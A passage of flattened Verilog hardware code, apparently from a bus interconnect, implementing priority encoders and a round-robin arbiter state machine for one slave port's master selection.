            if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[7] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[6] ) ) } == 2'h0 ) 
            begin
                s6_msel_pri_enc_pd3_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[7] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[6] ) ) } == 2'h1 ) 
                begin
                    s6_msel_pri_enc_pd3_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[7] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[6] ) ) } == 2'h2 ) 
                    begin
                        s6_msel_pri_enc_pd3_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s6_msel_pri_enc_pd3_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s6_msel_pri_enc_valid[3] or  { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[7] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[6] ) ) })
    begin
        if (  !( s6_msel_pri_enc_valid[3]) ) 
        begin
            s6_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[7] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[6] ) ) } == 2'h0 ) 
            begin
                s6_msel_pri_enc_pd3_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s6_msel_pri_enc_pd3_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s6_msel_pri_enc_valid[4] or  { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[9] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[8] ) ) })
    begin
        if (  !( s6_msel_pri_enc_valid[4]) ) 
        begin
            s6_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[9] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[8] ) ) } == 2'h0 ) 
            begin
                s6_msel_pri_enc_pd4_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[9] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[8] ) ) } == 2'h1 ) 
                begin
                    s6_msel_pri_enc_pd4_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[9] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[8] ) ) } == 2'h2 ) 
                    begin
                        s6_msel_pri_enc_pd4_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s6_msel_pri_enc_pd4_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s6_msel_pri_enc_valid[4] or  { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[9] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[8] ) ) })
    begin
        if (  !( s6_msel_pri_enc_valid[4]) ) 
        begin
            s6_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[9] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[8] ) ) } == 2'h0 ) 
            begin
                s6_msel_pri_enc_pd4_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s6_msel_pri_enc_pd4_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s6_msel_pri_enc_valid[5] or  { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[11] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[10] ) ) })
    begin
        if (  !( s6_msel_pri_enc_valid[5]) ) 
        begin
            s6_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[11] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[10] ) ) } == 2'h0 ) 
            begin
                s6_msel_pri_enc_pd5_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[11] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[10] ) ) } == 2'h1 ) 
                begin
                    s6_msel_pri_enc_pd5_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[11] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[10] ) ) } == 2'h2 ) 
                    begin
                        s6_msel_pri_enc_pd5_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s6_msel_pri_enc_pd5_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s6_msel_pri_enc_valid[5] or  { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[11] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[10] ) ) })
    begin
        if (  !( s6_msel_pri_enc_valid[5]) ) 
        begin
            s6_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[11] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[10] ) ) } == 2'h0 ) 
            begin
                s6_msel_pri_enc_pd5_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s6_msel_pri_enc_pd5_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s6_msel_pri_enc_valid[6] or  { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[13] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[12] ) ) })
    begin
        if (  !( s6_msel_pri_enc_valid[6]) ) 
        begin
            s6_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[13] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[12] ) ) } == 2'h0 ) 
            begin
                s6_msel_pri_enc_pd6_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[13] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[12] ) ) } == 2'h1 ) 
                begin
                    s6_msel_pri_enc_pd6_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[13] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[12] ) ) } == 2'h2 ) 
                    begin
                        s6_msel_pri_enc_pd6_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s6_msel_pri_enc_pd6_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s6_msel_pri_enc_valid[6] or  { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[13] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[12] ) ) })
    begin
        if (  !( s6_msel_pri_enc_valid[6]) ) 
        begin
            s6_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[13] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[12] ) ) } == 2'h0 ) 
            begin
                s6_msel_pri_enc_pd6_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s6_msel_pri_enc_pd6_pri_out_d0 = 4'b0010;
            end
        end
    end
    always @ (  s6_msel_pri_enc_valid[7] or  { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[15] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[14] ) ) })
    begin
        if (  !( s6_msel_pri_enc_valid[7]) ) 
        begin
            s6_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[15] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[14] ) ) } == 2'h0 ) 
            begin
                s6_msel_pri_enc_pd7_pri_out_d1 = 4'b0001;
            end
            else
            begin 
                if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[15] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[14] ) ) } == 2'h1 ) 
                begin
                    s6_msel_pri_enc_pd7_pri_out_d1 = 4'b0010;
                end
                else
                begin 
                    if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[15] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[14] ) ) } == 2'h2 ) 
                    begin
                        s6_msel_pri_enc_pd7_pri_out_d1 = 4'b0100;
                    end
                    else
                    begin 
                        s6_msel_pri_enc_pd7_pri_out_d1 = 4'b1000;
                    end
                end
            end
        end
    end
    always @ (  s6_msel_pri_enc_valid[7] or  { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[15] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[14] ) ) })
    begin
        if (  !( s6_msel_pri_enc_valid[7]) ) 
        begin
            s6_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
        end
        else
        begin 
            if ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[15] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[14] ) ) } == 2'h0 ) 
            begin
                s6_msel_pri_enc_pd7_pri_out_d0 = 4'b0001;
            end
            else
            begin 
                s6_msel_pri_enc_pd7_pri_out_d0 = 4'b0010;
            end
        end
    end
    assign s6_msel_pri_enc_pri_out_tmp = ( ( ( ( ( ( ( ( ( ( s6_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd0_pri_out_d0 ) : ( s6_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s6_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd1_pri_out_d0 ) : ( s6_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s6_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd2_pri_out_d0 ) : ( s6_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s6_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd3_pri_out_d0 ) : ( s6_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s6_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd4_pri_out_d0 ) : ( s6_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s6_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd5_pri_out_d0 ) : ( s6_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s6_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd6_pri_out_d0 ) : ( s6_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s6_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd7_pri_out_d0 ) : ( s6_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) );
    always @ (  ( ( ( ( ( ( ( ( ( ( s6_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd0_pri_out_d0 ) : ( s6_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s6_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd1_pri_out_d0 ) : ( s6_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s6_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd2_pri_out_d0 ) : ( s6_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s6_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd3_pri_out_d0 ) : ( s6_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s6_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd4_pri_out_d0 ) : ( s6_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s6_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd5_pri_out_d0 ) : ( s6_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s6_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd6_pri_out_d0 ) : ( s6_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s6_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd7_pri_out_d0 ) : ( s6_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s6_msel_pri_enc_pri_out_tmp[3] ) 
        begin
            s6_msel_pri_enc_pri_out1 = 2'h3;
        end
        else
        begin 
            if ( s6_msel_pri_enc_pri_out_tmp[2] ) 
            begin
                s6_msel_pri_enc_pri_out1 = 2'h2;
            end
            else
            begin 
                if ( s6_msel_pri_enc_pri_out_tmp[1] ) 
                begin
                    s6_msel_pri_enc_pri_out1 = 2'h1;
                end
                else
                begin 
                    s6_msel_pri_enc_pri_out1 = 2'h0;
                end
            end
        end
    end
    always @ (  ( ( ( ( ( ( ( ( ( ( s6_msel_pri_enc_pd0_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd0_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd0_pri_out_d0 ) : ( s6_msel_pri_enc_pd0_pri_out_d1 ) ) ) ) | ( ( ( s6_msel_pri_enc_pd1_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd1_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd1_pri_out_d0 ) : ( s6_msel_pri_enc_pd1_pri_out_d1 ) ) ) ) ) | ( ( ( s6_msel_pri_enc_pd2_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd2_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd2_pri_out_d0 ) : ( s6_msel_pri_enc_pd2_pri_out_d1 ) ) ) ) ) | ( ( ( s6_msel_pri_enc_pd3_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd3_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd3_pri_out_d0 ) : ( s6_msel_pri_enc_pd3_pri_out_d1 ) ) ) ) ) | ( ( ( s6_msel_pri_enc_pd4_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd4_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd4_pri_out_d0 ) : ( s6_msel_pri_enc_pd4_pri_out_d1 ) ) ) ) ) | ( ( ( s6_msel_pri_enc_pd5_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd5_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd5_pri_out_d0 ) : ( s6_msel_pri_enc_pd5_pri_out_d1 ) ) ) ) ) | ( ( ( s6_msel_pri_enc_pd6_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd6_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd6_pri_out_d0 ) : ( s6_msel_pri_enc_pd6_pri_out_d1 ) ) ) ) ) | ( ( ( s6_msel_pri_enc_pd7_pri_sel == 2'd0 ) ) ? ( 4'h0 ) : ( ( ( ( s6_msel_pri_enc_pd7_pri_sel == 1'd1 ) ) ? ( s6_msel_pri_enc_pd7_pri_out_d0 ) : ( s6_msel_pri_enc_pd7_pri_out_d1 ) ) ) ) ))
    begin
        if ( s6_msel_pri_enc_pri_out_tmp[1] ) 
        begin
            s6_msel_pri_enc_pri_out0 = 2'h1;
        end
        else
        begin 
            s6_msel_pri_enc_pri_out0 = 2'h0;
        end
    end
    always @ (  posedge clk_i)
    begin
        if ( rst_i ) 
        begin
            s6_msel_pri_out <= 2'h0;
        end
        else
        begin 
            if ( s6_next ) 
            begin
                s6_msel_pri_out <= ( ( ( s6_msel_pri_enc_pri_sel == 2'd0 ) ) ? ( 2'h0 ) : ( ( ( ( s6_msel_pri_enc_pri_sel == 2'd1 ) ) ? ( s6_msel_pri_enc_pri_out0 ) : ( s6_msel_pri_enc_pri_out1 ) ) ) );
            end
        end
    end
    assign s6_msel_arb0_req = { ( s6_msel_req[7] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[15] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[14] ) ) } == 2'd0 ) ), ( s6_msel_req[6] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[13] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[12] ) ) } == 2'd0 ) ), ( s6_msel_req[5] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[11] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[10] ) ) } == 2'd0 ) ), ( s6_msel_req[4] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[9] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[8] ) ) } == 2'd0 ) ), ( s6_msel_req[3] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[7] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[6] ) ) } == 2'd0 ) ), ( s6_msel_req[2] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[5] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[4] ) ) } == 2'd0 ) ), ( s6_msel_req[1] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[3] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[2] ) ) } == 2'd0 ) ), ( s6_msel_req[0] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[1] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[0] ) ) } == 2'd0 ) ) };
    assign s6_msel_arb0_gnt = s6_msel_arb0_state;
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s6_msel_arb0_state <= s6_msel_arb0_grant0;
        end
        else
        begin 
            s6_msel_arb0_state <= s6_msel_arb0_next_state;
        end
    end
    always @ (  s6_msel_arb0_state or  { ( s6_msel_req[7] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[15] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[14] ) ) } == 2'd0 ) ), ( s6_msel_req[6] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[13] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[12] ) ) } == 2'd0 ) ), ( s6_msel_req[5] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[11] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[10] ) ) } == 2'd0 ) ), ( s6_msel_req[4] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[9] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[8] ) ) } == 2'd0 ) ), ( s6_msel_req[3] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[7] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[6] ) ) } == 2'd0 ) ), ( s6_msel_req[2] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[5] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[4] ) ) } == 2'd0 ) ), ( s6_msel_req[1] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[3] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[2] ) ) } == 2'd0 ) ), ( s6_msel_req[0] & ( { ( ( ( s6_msel_pri_sel == 2'd2 ) ) ? ( rf_conf6[1] ) : ( 1'b0 ) ), ( ( ( s6_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf6[0] ) ) } == 2'd0 ) ) } or  1'b0)
    begin
        s6_msel_arb0_next_state = s6_msel_arb0_state;
        case ( s6_msel_arb0_state ) 
        s6_msel_arb0_grant0:
        begin
            if (  !( s6_msel_arb0_req[0]) | 1'b0 ) 
            begin
                if ( s6_msel_arb0_req[1] ) 
                begin
                    s6_msel_arb0_next_state = s6_msel_arb0_grant1;
                end
                else
                begin 
                    if ( s6_msel_arb0_req[2] ) 
                    begin
                        s6_msel_arb0_next_state = s6_msel_arb0_grant2;
                    end
                    else
                    begin 
                        if ( s6_msel_arb0_req[3] ) 
                        begin
                            s6_msel_arb0_next_state = s6_msel_arb0_grant3;
                        end
                        else
                        begin 
                            if ( s6_msel_arb0_req[4] ) 
                            begin
                                s6_msel_arb0_next_state = s6_msel_arb0_grant4;
                            end
                            else
                            begin 
                                if ( s6_msel_arb0_req[5] ) 
                                begin
                                    s6_msel_arb0_next_state = s6_msel_arb0_grant5;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb0_req[6] ) 
                                    begin
                                        s6_msel_arb0_next_state = s6_msel_arb0_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb0_req[7] ) 
                                        begin
                                            s6_msel_arb0_next_state = s6_msel_arb0_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb0_grant1:
        begin
            if (  !( s6_msel_arb0_req[1]) | 1'b0 ) 
            begin
                if ( s6_msel_arb0_req[2] ) 
                begin
                    s6_msel_arb0_next_state = s6_msel_arb0_grant2;
                end
                else
                begin 
                    if ( s6_msel_arb0_req[3] ) 
                    begin
                        s6_msel_arb0_next_state = s6_msel_arb0_grant3;
                    end
                    else
                    begin 
                        if ( s6_msel_arb0_req[4] ) 
                        begin
                            s6_msel_arb0_next_state = s6_msel_arb0_grant4;
                        end
                        else
                        begin 
                            if ( s6_msel_arb0_req[5] ) 
                            begin
                                s6_msel_arb0_next_state = s6_msel_arb0_grant5;
                            end
                            else
                            begin 
                                if ( s6_msel_arb0_req[6] ) 
                                begin
                                    s6_msel_arb0_next_state = s6_msel_arb0_grant6;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb0_req[7] ) 
                                    begin
                                        s6_msel_arb0_next_state = s6_msel_arb0_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb0_req[0] ) 
                                        begin
                                            s6_msel_arb0_next_state = s6_msel_arb0_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb0_grant2:
        begin
            if (  !( s6_msel_arb0_req[2]) | 1'b0 ) 
            begin
                if ( s6_msel_arb0_req[3] ) 
                begin
                    s6_msel_arb0_next_state = s6_msel_arb0_grant3;
                end
                else
                begin 
                    if ( s6_msel_arb0_req[4] ) 
                    begin
                        s6_msel_arb0_next_state = s6_msel_arb0_grant4;
                    end
                    else
                    begin 
                        if ( s6_msel_arb0_req[5] ) 
                        begin
                            s6_msel_arb0_next_state = s6_msel_arb0_grant5;
                        end
                        else
                        begin 
                            if ( s6_msel_arb0_req[6] ) 
                            begin
                                s6_msel_arb0_next_state = s6_msel_arb0_grant6;
                            end
                            else
                            begin 
                                if ( s6_msel_arb0_req[7] ) 
                                begin
                                    s6_msel_arb0_next_state = s6_msel_arb0_grant7;
                                end
                                else
                                begin 
                                    if ( s6_msel_arb0_req[0] ) 
                                    begin
                                        s6_msel_arb0_next_state = s6_msel_arb0_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s6_msel_arb0_req[1] ) 
                                        begin
                                            s6_msel_arb0_next_state = s6_msel_arb0_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s6_msel_arb0_grant3:
        begin
            if (  !( s6_msel_arb0_req[3]) | 1'b0 ) 
            begin
                if ( s6_msel_arb0_req[4] ) 
                begin
                    s6_msel_arb0_next_state = s6_msel_arb0_grant4;
                end
                else
                begin 
                    if ( s6_msel_arb0_req[5] ) 
                    begin
